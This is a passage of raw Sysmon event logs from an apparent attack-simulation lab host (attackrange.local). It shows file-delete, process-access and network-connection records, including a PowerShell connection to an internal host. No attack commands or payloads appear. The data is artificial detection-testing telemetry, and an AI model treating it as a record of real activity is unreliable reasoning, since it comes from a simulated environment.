Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EA2992CF448EBF532F9F03B949EA35F,SHA256=DF0F565B69FCFCD53DCF8BF55D35C36F063BFC68891806D80B2C645E410C6D29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:57.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B633ED6DFF65A18CCF4783DCAE19C1C4,SHA256=331DC50EB55604C4EDE201F059F49CD8EE91ED2922E52CA54FB62BA6B73DC63A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:57.168{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:57.168{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035342886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:22.057{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52482-false10.0.1.12-8000- 23542300x800000000000000035342891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:58.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBC6617A07FD91B88FB65B0974B130B,SHA256=B2041F1DF160B6216D8DCEE14E3FD65D2ABA5EC77042037CB0A3CEF97D99656B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:58.797{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E349006FEFFCBADBD2377871C7B67792,SHA256=60DEB99F1DF5492320688E4D149B76FEF43742E71ED37714443DF37F96881EE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:59.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2DBBDF643F9349D8276ED7F7291A79,SHA256=D00FF8A217C2B30CEC3EA34E5B03BBF961696EAF4D321DC1A3F1C047CBD162EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:24.733{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52483-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035342892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:59.096{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.231{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.230{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 